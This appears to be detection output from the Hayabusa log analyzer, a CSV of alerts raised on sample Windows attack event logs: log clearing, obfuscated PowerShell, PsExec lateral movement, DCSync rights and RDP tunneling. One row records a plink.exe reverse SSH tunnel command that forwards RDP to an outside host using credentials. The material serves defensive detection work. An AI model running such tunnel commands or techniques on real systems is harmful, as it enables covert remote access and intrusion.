+2016-09-21 03:45:16.455 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 03:45:24.408 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 03:45:48.501 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-system.evtx
+2016-09-21 04:15:32.581 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx
+2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,System log file was cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
+2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx
+2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Addition of SID History to Active Directory Object,,rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.243 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx
+2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx
+2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: blabla.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser  :  Share Name: \\*\ADMIN$  :  Share Path: \??\C:\Windows  :  File: blabla.exe  :  IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx
+2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx
+2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx
+2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: helpdesk  :  Workstation evil.internal.corp  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: EXCHANGE$  :  Workstation EXCHANGE  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,informational,Logon Type 3 - Network,User: EXCHANGE$  :  Workstation: EXCHANGE  :  IP Address: 192.168.111.87  :  Port: 58128  :  LogonID: 0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx
+2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,Logon Type 5 - Service,User: sshd_server  :  Workstation: PC02  :  IP Address: -  :  Port: -  :  LogonID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: PC02  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x21f73  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: IEUser  :  Workstation: PC02  :  IP Address: 127.0.0.1  :  Port: 49164  :  LogonID: 0x45120  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: PC02  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x4a26d  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON  :  Workstation: PC01  :  IP Address: 10.0.2.17  :  Port: 49168  :  LogonID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON  :  Workstation: PC01  :  IP Address: 10.0.2.17  :  Port: 49169  :  LogonID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx
+2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,informational,Logon Type 11 - CachedInteractive,User: user01  :  Workstation: PC01  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1414c8  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$  :  Target User: user01  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$  :  Target User: user01  :  IP Address: -  :  Process: C:\Windows\System32\lsass.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,informational,Logon Type 7 - Unlock,User: user01  :  Workstation: PC01  :  IP Address: -  :  Port: -  :  LogonID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01  :  LogonID: 0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01  :  LogonID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: admin01  :  Workstation: PC01  :  IP Address: 127.0.0.1  :  Port: 49274  :  LogonID: 0x14a321  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$  :  Target User: admin01  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,low,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01  :  LogonID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx
+2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: plink.exe  10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test  :  Path: C:\Users\IEUser\Desktop\plink.exe  :  User: PC01\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/sysmon_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: PC01\IEUser  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\TSTheme.exe -Embedding  :  Path: C:\Windows\System32\TSTheme.exe  :  User: PC01\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe  :  Path: C:\Windows\System32\AtBroker.exe  :  User: PC01\IEUser  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
+2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0)  :  Path: C:\Windows\System32\taskhost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx
